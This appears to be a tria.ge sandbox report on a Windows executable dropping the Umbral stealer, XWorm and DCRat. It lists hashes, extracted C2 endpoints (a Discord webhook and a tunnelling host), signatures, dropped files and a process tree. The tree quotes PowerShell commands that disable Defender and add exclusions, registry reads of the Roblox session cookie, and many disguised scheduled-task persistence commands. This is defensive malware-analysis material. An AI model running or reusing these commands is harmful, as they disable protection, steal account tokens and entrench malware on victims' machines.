Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

3969991942...b8.exe

windows7-x64

10

3969991942...b8.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17/05/2024, 20:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    3969991942bb5b6130977411ae258ab8.exe

  • Size

    19.8MB

  • MD5

    3969991942bb5b6130977411ae258ab8

  • SHA1

    c391e670488d73dc79c2acfab1e845d9c3e5227e

  • SHA256

    aec009724ba208376f91cbfafd60db1e965f9016f17f14bfb3b074dde1f6ae28

  • SHA512

    ce009d113cd85629cb744c0e30fecc9cb1f3bc353b546eab676604a3eec976c5f0dc60cb29b7f4841bb71bb7596128340d1b222408c9aeeb9f9671d1a1add00a

  • SSDEEP

    393216:O581WtclJGQ9GnlC58mn3yJQjNKlgtcTuOYTmWYlY5nGPEy+tj7NJX:OeWgdGnlCqm3vKCTmpY5Py+r

Score
10/10
dcratumbralxwormexecutioninfostealerratspywarestealertrojan

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1221847080373584144/7stbODqa-C2IH_V1s7-AaD6fECqR68YLov_s341xewFGvFGlgl7fRFcAsV3CtRNlSgzQ

Extracted

Family

xworm

C2

127.0.0.1:30683

operating-niger.gl.at.ply.gg:30683:30683
Attributes
  • Install_directory

    %AppData%

  • install_file

    XClient.exe

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

    ratinfostealerdcrat
  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • Process spawned unexpected child process 36 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • DCRat payload 3 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

    rat
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 7 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 8 IoCs
  • Drops file in Windows directory 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 36 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry class 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 59 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\3969991942bb5b6130977411ae258ab8.exe
    "C:\Users\Admin\AppData\Local\Temp\3969991942bb5b6130977411ae258ab8.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1288
    • C:\Users\Admin\AppData\Roaming\Nursultan (17).exe
      "C:\Users\Admin\AppData\Roaming\Nursultan (17).exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:2460
      • C:\Users\Admin\AppData\Roaming\Nursultan.exe
        "C:\Users\Admin\AppData\Roaming\Nursultan.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        PID:5016
      • C:\Users\Admin\AppData\Roaming\LoaderMas.exe
        "C:\Users\Admin\AppData\Roaming\LoaderMas.exe"
        3⤵
        • Checks computer location settings
        • Drops startup file
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1816
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\LoaderMas.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4396
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'LoaderMas.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4136
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4220
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1056
    • C:\Users\Admin\AppData\Roaming\t.bat
      "C:\Users\Admin\AppData\Roaming\t.bat"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:4552
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\perfdhcpSvc\LUps3wjkA6jhdk7xRy8J55z2u.vbe"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:4920
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\perfdhcpSvc\mStUjP0ksX5N.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2796
          • C:\perfdhcpSvc\Chainprovider.exe
            "C:\perfdhcpSvc\Chainprovider.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Drops file in Windows directory
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4404
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\OOOQfReeqn.bat"
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1760
              • C:\Windows\system32\w32tm.exe
                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                7⤵
                  PID:1168
                • C:\perfdhcpSvc\StartMenuExperienceHost.exe
                  "C:\perfdhcpSvc\StartMenuExperienceHost.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4932
      • C:\Users\Admin\AppData\Roaming\Umbral.exe
        "C:\Users\Admin\AppData\Roaming\Umbral.exe"
        2⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3768
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2288
        • C:\Windows\SYSTEM32\attrib.exe
          "attrib.exe" +h +s "C:\Users\Admin\AppData\Roaming\Umbral.exe"
          3⤵
          • Views/modifies file attributes
          PID:4464
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Umbral.exe'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3212
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3692
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1516
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4324
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" os get Caption
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1272
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" computersystem get totalphysicalmemory
          3⤵
            PID:3704
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" csproduct get uuid
            3⤵
              PID:4776
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:960
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic" path win32_VideoController get name
              3⤵
              • Detects videocard installed
              PID:2068
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Roaming\Umbral.exe" && pause
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4836
              • C:\Windows\system32\PING.EXE
                ping localhost
                4⤵
                • Runs ping.exe
                PID:3740
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\perfdhcpSvc\System.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:1272
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\perfdhcpSvc\System.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:1624
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\perfdhcpSvc\System.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4592
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\Windows\bcastdvr\conhost.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:1096
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\bcastdvr\conhost.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:452
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 11 /tr "'C:\Windows\bcastdvr\conhost.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4908
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 13 /tr "'C:\perfdhcpSvc\OfficeClickToRun.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:1144
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\perfdhcpSvc\OfficeClickToRun.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4040
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 13 /tr "'C:\perfdhcpSvc\OfficeClickToRun.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:3304
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Nurik\WmiPrvSE.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:1368
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Nurik\WmiPrvSE.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:2220
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 8 /tr "'C:\Nurik\WmiPrvSE.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:2900
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\perfdhcpSvc\StartMenuExperienceHost.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4956
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\perfdhcpSvc\StartMenuExperienceHost.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:3368
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\perfdhcpSvc\StartMenuExperienceHost.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:748
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Portable Devices\csrss.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4840
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\csrss.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:672
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Portable Devices\csrss.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:3240
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\Windows\twain_32\StartMenuExperienceHost.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4220
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\twain_32\StartMenuExperienceHost.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:840
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Windows\twain_32\StartMenuExperienceHost.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4964
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\lsass.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4476
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\lsass.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:2896
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\lsass.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4488
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Nurik\RuntimeBroker.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:5100
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Nurik\RuntimeBroker.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:3772
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Nurik\RuntimeBroker.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4932
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\Windows\IdentityCRL\lsass.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:1584
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\IdentityCRL\lsass.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:460
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\Windows\IdentityCRL\lsass.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:1144
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Portable Devices\WmiPrvSE.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:1172
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\WmiPrvSE.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4776
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Portable Devices\WmiPrvSE.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:2888
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Defender\it-IT\StartMenuExperienceHost.exe'" /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:820
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Defender\it-IT\StartMenuExperienceHost.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:4792
        • C:\Windows\system32\schtasks.exe
          schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Defender\it-IT\StartMenuExperienceHost.exe'" /rl HIGHEST /f
          1⤵
          • Process spawned unexpected child process
          • Creates scheduled task(s)
          PID:2900

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          948B

          MD5

          985b3105d8889886d6fd953575c54e08

          SHA1

          0f9a041240a344d82bac0a180520e7982c15f3cd

          SHA256

          5178fdd457eb3eb25c8f72ed4c22c582a83de0d324db66d0446d660f226e944d

          SHA512

          0fd59bc4886b70aa3b7eeeaa23229b7fdc93410ca7f8452860e4a1bbda2559eaa5e4b05c3ec2d85f7d648daf3c16741f4c2c18f2dd3bae4cc4a4e57ae4f665b0

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          6d42b6da621e8df5674e26b799c8e2aa

          SHA1

          ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

          SHA256

          5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

          SHA512

          53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          d8cb3e9459807e35f02130fad3f9860d

          SHA1

          5af7f32cb8a30e850892b15e9164030a041f4bd6

          SHA256

          2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

          SHA512

          045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          0256bd284691ed0fc502ef3c8a7e58dc

          SHA1

          dcdf69dc8ca8bf068f65d20ef1563bbe283e2413

          SHA256

          e2fb83098e114084f51ed7187334f861ce670051046c39f338928296ca9a49cf

          SHA512

          c5b29c1e0a15ddb68b0579848066774fa7cdc6f35087bbbf47c05a5c0dcc1eb3e61b2ddadfbded8c1ed9820e637596a9f08a97db8fb18000d168e6b159060c42

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          ba169f4dcbbf147fe78ef0061a95e83b

          SHA1

          92a571a6eef49fff666e0f62a3545bcd1cdcda67

          SHA256

          5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

          SHA512

          8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

          Download Submit

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          944B

          MD5

          52afa702b34ab802e2ecd71d9539c829

          SHA1

          6a6f18158c82910e158d7e27972486c6e4dc5c93

          SHA256

          992fefff5236c174b6dd74b76a2c5c0d33470bec786ee4b30f5577aea27b8025

          SHA512

          5e42fead63b34fb62e4173e83e11110543583aece41f736c007d8512e8f23b6713140c9233bf99f9b9d1c3302a2f526bd4d33ed1ce1f777c9e0d9dea25e37639

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\OOOQfReeqn.bat
          Filesize

          207B

          MD5

          e78f932d0eff4899edfc22da5cc43704

          SHA1

          4915fa24356875484286faa7e551dda9cf9307a2

          SHA256

          476251c5b0021bb2ecbe2f051dc83d31f48df444f1067cf093742e69dadf504f

          SHA512

          4b7b2efc604267663b34784b189bd1e91d9453d7c1fa1a4bc721357fad332bed46573ce854c55dd25fff018187195c79ac1886d895abb9d44ce2a78ed5d8ffe4

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eveoqp2p.ozg.ps1
          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          Download Submit

        • C:\Users\Admin\AppData\Roaming\LoaderMas.exe
          Filesize

          63KB

          MD5

          a0dbdf3af38ead2237ccb781a098a431

          SHA1

          1434296af6c5530eb036718e860490e0adc3321a

          SHA256

          6f483da6b36646bf6f33db0c210bd3683ff29428a44d916a2f26a4240c1a9901

          SHA512

          dd7dc91a2e09b0c3906efbb486fb84d0289dc61338afd75d203f1ab2f49556c9523a8a9abc913363a45dde8194f5b2ee9d3d659807250047331944c39006edc3

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Nursultan (17).exe
          Filesize

          18.2MB

          MD5

          ed965403e795c3b563d67c734472ad93

          SHA1

          6b8b929239d5ef8f1f546c591c67acaf560de4dc

          SHA256

          6b7473e7177ef0666f6afe36b257d0730dababefc209ee1c5f2da319dbe1633d

          SHA512

          bd860103c5ac1bcc02bfefc669616a1b0103dfb3c611b0e4499cf4b1fc67d49c9cd57c1839936b75e0f0008aec0f84cb0af712feb334957972661405a137f649

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Nursultan.exe
          Filesize

          17.9MB

          MD5

          e504e3fc36fe4d6f182c98923979a779

          SHA1

          3ba9f1a9a15b79639a20cfcf79c9de31d15a17a6

          SHA256

          70b7b95bb952b3325476867307fc5bd4df5769b97bbcdd8b60e7b46e1b38e4a0

          SHA512

          63bbbc3ccf14b2846df64b8edae52b6431df52aa9e03569a28ca239ab02db94bf79ca8a0a30529e35a04ee5845768d752b99e6ce3830ab440c57850180ad1647

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Umbral.exe
          Filesize

          229KB

          MD5

          f48ef033300ec9fd3c77afff5c20e95f

          SHA1

          22d6125b980474b3f54937003a765cdd5352f9a8

          SHA256

          72ee11a905ca278130f02397422b4cc4944851065ce0072f9888b70c5ad40f1e

          SHA512

          847ee8cdb14879089c861168d6be90325304df490668a38447b37772423e6dab5e32a5df344ceb58410d3b24cf25cd7221e8768951e5aca14820996a1e8304bc

          Download Submit

        • C:\Users\Admin\AppData\Roaming\t.bat
          Filesize

          1.1MB

          MD5

          d85bd59cf0808fb894f60773e1594a0a

          SHA1

          84b9d205f3ae6ca4f8f1bb938ee8b4d452444cde

          SHA256

          f3ef597673421e514d7fed82b40d65386c3811c4a8f5553afd59fc632bca8746

          SHA512

          225788e3e98449f53e6206c585315a37c9ff6ed0b5425b2a98e50c7ac45ab3c187ccf7626f126ba300bd8dbdf89c864e89f85d6264edc89281745b081ec58f97

          Download Submit

        • C:\perfdhcpSvc\Chainprovider.exe
          Filesize

          827KB

          MD5

          d2ec227ddac047e735393e58e742fd44

          SHA1

          7aae5c76378f7cfcff8bb983695fa4c2577a20e2

          SHA256

          0e679527f2df9f87d33c82023256fac276c36006579d2d71877ccab4be847cce

          SHA512

          5a11b292a574bd2ca6c225af1e4c9f95004a49ce816cc59a73d4ab6e2a0b007a58ab56e5e0c004901c3ebe4ec06054e6e801f8e659711856857add6d43f38979

          Download Submit

        • C:\perfdhcpSvc\LUps3wjkA6jhdk7xRy8J55z2u.vbe
          Filesize

          200B

          MD5

          00b53f3e200522631227cac1a07e0646

          SHA1

          a0c69d58c7ca10f5fd5e1320b1b2f92081d7fcfe

          SHA256

          486c050aadc42906113b0c5c8485dff36b0187f343a732542608a91b0565146c

          SHA512

          22241ae8a31c7e564c9fb652947e4fe17f80c6e94dfe1a3bb5890f6eb97797ee32ccfff5d647eef02bda31bd47c5d95521cd0c6349a01e501e6e064ea6306243

          Download Submit

        • C:\perfdhcpSvc\mStUjP0ksX5N.bat
          Filesize

          34B

          MD5

          a9330c6da12d90d5d956ae2bbcf017d7

          SHA1

          7ebaa14eed80db6d9f0c0c0f1ecab1a9c3f61410

          SHA256

          b49853470383dce14680f656aca7ea449b1d6aabb3f18d4165ebd7e3e7545393

          SHA512

